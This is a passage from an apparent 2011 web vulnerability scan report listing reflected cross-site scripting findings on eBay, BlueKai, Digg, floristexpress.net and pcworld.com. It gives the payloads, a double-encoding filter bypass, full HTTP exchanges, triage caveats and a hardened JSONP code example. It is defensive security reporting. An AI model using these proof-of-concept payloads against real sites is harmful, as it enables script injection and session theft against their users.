The value of the footer&cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d0c65%3balert(1)//3c480ac7649 was submitted in the footer&cb parameter. This input was echoed as d0c65;alert(1)//3c480ac7649 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Triage note: this is a JSONP endpoint, and the response below is served with Content-Type: text/json. A browser that navigates to the URL does not execute a text/json body as script, and a page that pulls it in with a script element runs the callback in that page's origin, not in rover.ebay.com's. The unescaped reflection of the callback name is real and should be fixed with an identifier allow-list, but the High rating is only justified once the response has been shown to execute in the ebay.com origin, for example through a browser that renders the body as HTML.

Request

GET /idmap/0?footer&cb=vjo.dsf.assembly.VjClientAssembler._callback0d0c65%3balert(1)//3c480ac7649&_vrdm=1297449096889 HTTP/1.1
Host: rover.ebay.com
Proxy-Connection: keep-alive
Referer: http://www.ebay.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cssg=15fccc2d12e0a02652943d14ffeea689; s=CgAD4ACBNVtG0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2ODmOKdKX; nonsession=CgADKACBWu4G0MTVmY2NjMmQxMmUwYTAyNjUyOTQzZDE0ZmZlZWE2OGEAywABTVWHPDEf/9BP; dp1=bu1p/QEBfX0BAX19AQA**4f36b3b4^tzo/1685117e787^; lucky9=5245946; npii=btrm/svid%3D991010211714f36b3c3^tguid/15fccc2d12e0a02652943d14ffeea68a4f36b3c3^cguid/f65c9e8712d0a0aa12e4b294ff6547f14f36b3c3^; ebay=%5Ecv%3D15555%5Esbf%3D%23100000%5Ejs%3D1%5Ecos%3D53%5E

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*ts67.1%3F17613-12e15fe4b6c
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/json
Date: Fri, 11 Feb 2011 18:31:50 GMT
Content-Length: 103

try{vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649(["","",86400]);}catch(e){}

1.119. http://tags.bluekai.com/site/50 [phint parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the phint request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 353f6%2527%253balert%25281%2529%252f%252fc16c49bef95 was submitted in the phint parameter. This input was echoed as 353f6';alert(1)//c16c49bef95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character. That the doubly encoded payload arrives fully decoded in the response (hashID='...353f6';alert(1)//...') shows the value is URL-decoded again after the filter has run; an input filter that sits in front of a second decode is not a defence, and the value needs to be escaped for the single-quoted JavaScript string at the point where it is written into the page.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC353f6%2527%253balert%25281%2529%252f%252fc16c49bef95&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=[SNIP]; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=[SNIP]; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:06 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=4ReD5tQsbDzsHNJo; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=[SNIP]; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJpf01F9XvQCNJKHyRWJhonMCfcDGqJ1enGXe9hqlyRYhVjyyNMKDakZCMrXWeWZOCAIOGRYP7IQgY0Dhzp99juPAwxsiGAYhS8SmyBj37YEJfWh1eh8SKFnhiecOhmEOnJu2qV9bQYS/iJw; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pgOCuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uDLtOL3j3PL783xVkVQRSrggJhrSJj+RJ3VZVjGISQMNOHgWy1Sxka6zEylE9aj8va9=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niHytCFGy199y79MG=; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=[SNIP]; expires=Wed, 10-Aug-2011 18:33:06 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:06 GMT; path=/; domain=.bluekai.com
BK-Server: 7b05
Content-Length: 803
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=ebayus_cs=1&betq=7847=399109" width=1 height=1 border=0 alt="">
<img sr
...[SNIP]...
<script>var referrer='http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=200565765597&_trksid=%20p2041474.m622&_trkparms=clkid%3D7016594469467627520'; var hashID='dbdcb53f2576976d806d6498794024fc353f6';alert(1)//c16c49bef95'; var taxonomyJSON=[[27651,5540,5266,3177,19,3],[79063,6463]];</script>
...[SNIP]...

1.120. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload c78a6<script>alert(1)</script>c0a5c709b0 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Triage note: the response is served as application/json and is a JSONP call (__DBW.collectDiggs(...)). Inside a JSON string literal the <script> tags are inert when the body is consumed as script, and browsers do not render application/json as HTML, so this does not execute in the widgets.digg.com origin on its own. The missing escaping is still worth fixing: the HTML parser ends a <script> element at the first </script> regardless of JavaScript quoting, so the same serializer output becomes exploitable wherever it is inlined in an HTML page; emitting < as \u003c closes that gap.
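A hardened JSONP responder for the two patterns above, findings 1.118 (callback name reflected into a JavaScript expression) and 1.120 (raw < left inside a JSON string), as an added JavaScript example; it is not eBay's or Digg's code and the function names isSafeCallback, jsonForScript and jsonpBody are hypothetical. The try/catch wrapper copies the shape of the rover.ebay.com response, and the sample inputs are constructed from the two requests.

```javascript
// Added example for findings 1.118 and 1.120 (not code from the scan report,
// eBay or Digg). All function names are hypothetical.

// Accept only a dotted identifier path: the legitimate callback
// "vjo.dsf.assembly.VjClientAssembler._callback0" passes; anything
// containing ';', '(', quotes or whitespace does not.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// JSON.stringify output is valid JavaScript, but a raw "<" inside a string
// still lets "</script>" end a script element if the JSON is ever inlined in
// HTML. Escaping <, >, & and the two JS line terminators keeps it inert there
// too, and JSON.parse still decodes the \uXXXX escapes to the original text.
function jsonForScript(data) {
  return JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Builds the response body. Throws on a bad callback instead of echoing it,
// so the caller can answer 400 rather than reflect attacker JavaScript.
function jsonpBody(callback, data) {
  if (!isSafeCallback(callback)) {
    throw new Error('rejected callback name');
  }
  return 'try{' + callback + '(' + jsonForScript(data) + ');}catch(e){}';
}

// Constructed inputs mirroring the two findings.
const EBAY_GOOD = 'vjo.dsf.assembly.VjClientAssembler._callback0';
const EBAY_BAD = 'vjo.dsf.assembly.VjClientAssembler._callback0d0c65;alert(1)//3c480ac7649';
const DIGG_URL = 'http://www.pcworld.com/article/219333/x.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0';

function demo() {
  let rejected = false;
  try {
    jsonpBody(EBAY_BAD, ['', '', 86400]);
  } catch (e) {
    rejected = true;
  }
  return {
    goodAccepted: isSafeCallback(EBAY_GOOD),   // true
    badRejected: rejected,                     // true
    diggBody: jsonpBody('__DBW.collectDiggs', { url: DIGG_URL, diggs: 0 }), // no raw "<"
  };
}
```

Validating the callback as an identifier path is the only robust fix for 1.118; escaping it is not an option because the name has to be emitted as code. For 1.120 the allow-list does not apply (the callback is fixed) and the \u003c escaping is what matters.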

Request

GET /buttons/count?url=http%3A//www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%3Dhp_fvc78a6<script>alert(1)</script>c0a5c709b0 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fv
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 11 Feb 2011 19:29:38 GMT
Via: NS-CACHE: 100
Etag: "6907248ba8c229d7c8a253fd71e5626f06790e77"
Content-Length: 202
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 11 Feb 2011 19:39:37 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html?tk=hp_fvc78a6<script>alert(1)</script>c0a5c709b0", "diggs": 0});

1.121. http://www.floristexpress.net/ [refcode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floristexpress.net
Path:   /

Issue detail

The value of the refcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b295e"%3balert(1)//b7f69ae6950 was submitted in the refcode parameter. This input was echoed as b295e";alert(1)//b7f69ae6950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Caveat: the application uppercases the value before echoing it (s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950", and the ref_code cookie is set the same way). JavaScript identifiers are case-sensitive, so ALERT(1) as reflected would raise a ReferenceError rather than execute. The break-out from the double-quoted string is confirmed, but a working payload has to survive uppercasing, which should be verified before treating the finding as Certain.

Request

GET /?refcode=ORDb295e"%3balert(1)//b7f69ae6950&RefPage=pfc_PRODUCT-30050119 HTTP/1.1
Host: www.floristexpress.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rrefbdf\%22%3balert(document.cookie)//5e820bfb5e
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=IZJPJPS192.168.100.163CKOWO; path=/
Date: Fri, 11 Feb 2011 18:54:01 GMT
Server: Apache
Set-Cookie: PHPSESSID=f5bd434039a4b158c8c4c53fc2d56586; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=a4f657633e93d2b0ff275b5f8026f4ac; path=/
Set-Cookie: ref_code=ORDB295E%22%3BALERT%281%29%2F%2FB7F69AE6950; path=/
Content-Type: text/html
Content-Length: 102831

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Same Day Flower Delivery by Florist E
...[SNIP]...
.eVar9="";
s.eVar13="";
s.eVar14="";
s.eVar18="";
s.eVar22="10:30AM";
s.eVar24="";
s.eVar25="";
s.eVar26="";
s.eVar27="";
s.eVar28="";
s.eVar29="";
s.eVar30="";
s.eVar31="";
s.eVar33="B";
s.eVar36="ORDB295E";ALERT(1)//B7F69AE6950";
s.eVar40="";
s.eVar47="";

s.products="";

s.state="";
s.zip="";
s.purchaseID="";

var s_code=s.t();if(s_code)document.write(s_code);
</script>
...[SNIP]...

1.122. http://www.pcworld.com/search.html [qt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /search.html

Issue detail

The value of the qt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e12b4</script><script>alert(1)</script>0a7e49333ec was submitted in the qt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the break-out here does not rely on the JavaScript string at all: the HTML parser ends a <script> element at the first </script> it sees regardless of JavaScript quoting, so escaping quotation marks alone would not fix this. Any value placed inside a script block must have < (or at minimum the / of a closing tag) encoded, for example as \u003c.

Request

GET /search.html?qt=web+servicese12b4</script><script>alert(1)</script>0a7e49333ec&s=d&tk=srch_art_tag HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1667652152.1297452630.1297452630.1297452630.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1297452630.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%253Dhp_fv; base_domain_75ac625a0a0b5cc6896b2ab1e1f9b3a7=pcworld.com; fbsetting_75ac625a0a0b5cc6896b2ab1e1f9b3a7=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; fbGauntlet=%7B%22fbconnected%22%3A%22false%22%2C%22count%22%3A0%2C%22fbname%22%3A%22%22%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26AAC70A051D1371-4000012F6001C3F0[CE]; foresee.session={"pv":1,"paused":"0","timeout":3,"start":1297452643608,"rid":"1297452643610_770588","current":"http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html","site":"pcworld","lc":{"browse":1},"ls":{"browse":false},"ec":{"browse":0},"sd":{"idx":0,"name":"browse","section":""}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 11 Feb 2011 19:30:51 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B7D2CCE5B51EFE148748478AD76F41CA; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 11 Feb 2011 19:30:51 GMT
Connection: close
Vary: Accept-Encoding


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
;
s.prop21="";
s.prop22="";
s.prop23="";
s.prop24="";
s.prop25="";
s.prop26="";
s.prop27="";
s.prop28=s.getQueryParam('tk') ? "tokens:"+s.getQueryParam('tk') : "";
s.prop29="general search:web servicese12b4</script><script>alert(1)</script>0a7e49333ec";
s.prop30="";
s.prop31="";
s.prop32="";
s.prop33="";
s.prop34="";
s.prop37="search:catchall2other:catchall2other";
s.prop38="";
s.prop39="";
s.prop40="";
/* Conversion Variables */
s.campaign=s.getQu
...[SNIP]...

1.123. http://www.pcworld.com/search.html [s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /search.html

Issue detail

The value of the s request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e10"><script>alert(1)</script>c5908e4ca6f was submitted in the s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.html?qt=web+services&s=d72e10"><script>alert(1)</script>c5908e4ca6f&tk=srch_art_tag HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1667652152.1297452630.1297452630.1297452630.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1297452630.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html%3Ftk%253Dhp_fv; base_domain_75ac625a0a0b5cc6896b2ab1e1f9b3a7=pcworld.com; fbsetting_75ac625a0a0b5cc6896b2ab1e1f9b3a7=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; fbGauntlet=%7B%22fbconnected%22%3A%22false%22%2C%22count%22%3A0%2C%22fbname%22%3A%22%22%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26AAC70A051D1371-4000012F6001C3F0[CE]; foresee.session={"pv":1,"paused":"0","timeout":3,"start":1297452643608,"rid":"1297452643610_770588","current":"http://www.pcworld.com/article/219333/online_dating_for_nerds_looking_for_love_in_all_the_wrong_postings.html","site":"pcworld","lc":{"browse":1},"ls":{"browse":false},"ec":{"browse":0},"sd":{"idx":0,"name":"browse","section":""}}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 11 Feb 2011 19:31:15 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5002CB634254BF4419DA47B1409E27C3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 11 Feb 2011 19:31:15 GMT
Connection: close
Vary: Accept-Encoding


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/search.html?qt=web+services&amp;s=d72e10"><script>alert(1)</script>c5908e4ca6f" class="selected">
...[SNIP]...

1.124. http://tags.bluekai.com/site/50 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/50

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 243c4'-alert(1)-'d364363071b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the reflected value arrives in a request header rather than in the URL, this is harder to exploit against another user than the findings above, which is why it is rated Low. It is not unexploitable, though. A browser builds the Referer from the URL of the page that issued the request, so an attacker who controls a page can put the payload in that page's own query string and then load this URL in a frame or script element; the response (text/html, as seen for the same path in 1.119) then runs in the bluekai.com origin. Historically, client-side technologies such as Flash could also be used to send arbitrary request headers. Current browsers default to a strict-origin-when-cross-origin referrer policy, which strips the path and query from cross-origin requests and so blocks the framing route unless the referring page relaxes it; verify in the browsers that matter before changing the rating.

Request

GET /site/50?ret=html&limit=4&btp=1&phint=kw%3D&phint=eid%3D283&phint=a%3D-1&phint=g%3D0&uhint=zip%3D0&phint=tcat%3D152869&phint=kh%3DDBDCB53F2576976D806D6498794024FC&phint=bread%3D[Jewelry%20&%20Watches,%20Engagement%20&%20Wedding,%20Engagement%20Rings,%20Diamond,%20Diamond%20Solitaire%20with%20Accents]&phint=bin%3D1499.99&phint=asp%3DMain%20Stone%20Shape,Heart,Main%20Stone%20Treatment,Not%20Enhanced,Carat%20Total%20Weight,0.90%20-%201.39,Exact%20Carat%20Total%20Weight,.90,Main%20Stone%20Certification/Grading,EGL%20USA,Metal,14k%20White%20Gold,Metal%20Purity,14k,Ring%20Size,6,Main%20Stone,Diamond,Style,Engagement,Jewelry%20Type,Ring,Size,6,Gender,Women's HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJpE8VaQtwGt6JKHRxRlMYUehXOxymGwj1kYVzy1cny1eOvulA9hDSeRPV+7/WLPvwqdoutxBRZBQKWJA1UsT16n1RVJxRTw/Lq/z9zrJQADu2UU9GGO9BVGsj1=; bkw4=...[SNIP]...; bklc=4d55308f; bk=yQSpJZmZF9ysHNJo; bkc=...[SNIP]...; bkst=KJhkAnNv96WDCxzBYYqOyk/DYyLnPIq7p+0jxixZSXyZi6Q6DjrxpHoJk/6sTb3BMSt5gteoWtQkwGYkRsV77VIQLNLJlrg07U18C8LCE8wWpF+ahzIxjfLFWv8NV0+xMQAj5ue9y9kWtcUY+QRCOOgEh4MBLd8Ub8XQGIQGsLHHqHy+IgjGZQ9aTWoEek/pQ6oydEsV0awjBYl5dK04bXzDl4hc5hqBWfX6G1KBJ7MPA323y6S840qweb35653sWAapYpbEwF4Vm6mvOq4rrANdXXugRgZNcD4fkXmTTQpgXwmNRZl8UBGHaxUeMEszYD6jYFa07uEmogJCkWFvrWODisi6W5t2cuFw8x7JAzBN+IB57HqfrN8diu4XNFJaWF4YkLwLApuP/WDnxZe/mE4/QpRLtf2v3RNK4RQndi28rkgN; bkdc=res

Response

HTTP/1.0 200 OK
Date: Fri, 11 Feb 2011 18:33:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=PbEVTB7F/B6sHNJo; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=...[SNIP]...; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJhn8sPQKBWxbLFWT19WREW04muaLKb0yaM3zea5cQSsgVXeQSyjleYVBNuVZKWmn6u1iDssMTsCQBD4vYLnjEWpz9OkJuu2QVvixnsgNL89kioxfw2nV0OgWCLeyh1QiTNOMQdYRZuxOnJu2qV9n9Yp/0jj; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsn/pkOQuWkvuDT0BDTp1MDlLpxlufWy1WLh1fs61nz61E90uD+I6He3YNE1y1Sxka6zEbym9WSLsJQ=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkp1=KJhMRZOQ19niaytCFGy199hn9A9=; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpE8tOQRsxyRZOQW9qiaytCFQhGQ/zOovvaATWCXbO1rRATi1zaaOmW3F20IloMLPrJ4qU/mFKcPuUtFWOhaGq+zQy1I+fwfw8oQ5Hp9MULZXf9T1BLf3FgnwwbAjZDwRyIyLM9y1f9q1M9XmOKR5G2qVENr8Zy3t5kZ9BDltEkGgjakhMNq9pUQafzdvJ/XhHHb+AjdQnP7yLTD1VrMbpI0D+qgm38sHhBsOiAfeZ6XXc34yae0bmPQVcgt6e4w0LdUFJBugYc6481/wUgQmopCD+Yw9pHlRmrcZxIWXB+DySsv9XF+Qhe8w9cZ4IgnZ+w0Kx1KhQBeWYQIIUBsOQT1t20lMBsPiXCbKlfaHh4n4RysZQTD/VxOxBe+jJgTDHE2wx9zDK9wRpmjyvj2xuGFFHpErQvDtEpxKcMokgvB/LMt2fbF7dF2nyiIpYyIPSVe9yc4yH0qL/y48z7e8BtK8A2M9SojtjyOv3dFX3NqJLone0UJAcXslUM1kI2qhL6FDtOZZXcPOdiBBFCB/ofdQw5QhTIIVeprRe3kXplp+s6Q/VdRy1eylzLTqXngnfDZGaChzNNUvTVbwsnqM8/wx5e1PY2kAuGUvXaz4kgAh6eQdzc++eJkLMrFtg+e92wicLvf/1Rxm7Cn2OXZ8Abi3+L6z14lE6nZWe37yeBMd7BZV++eNnw9L0AA71RsxoRdEcz/y6mEh9GrqO4poWW2zh+VN7zymGjxmgPYSAlYZuvSlK9CxXpMFxtObpIOPO5iBbWssnPFyu3IfnG5zPtO8eFxKb4j9nhHIovxrbuXrgNrm49QOj4Lwx9YAXsC7OcOGjFCdqZ99YGGDbF; expires=Wed, 10-Aug-2011 18:33:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Sat, 12-Feb-2011 18:33:12 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 737
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1068244&t=2" width=1 height=1 border=0 alt="">
<img src="http://leadback.advertising.com/adcedge/lb?si
...[SNIP]...
<script>var referrer='http://www.google.com/search?hl=en&q=243c4'-alert(1)-'d364363071b'; var hashID='dbdcb53f2576976d806d6498794024fc'; var taxonomyJSON=[];</script>
...[SNIP]...

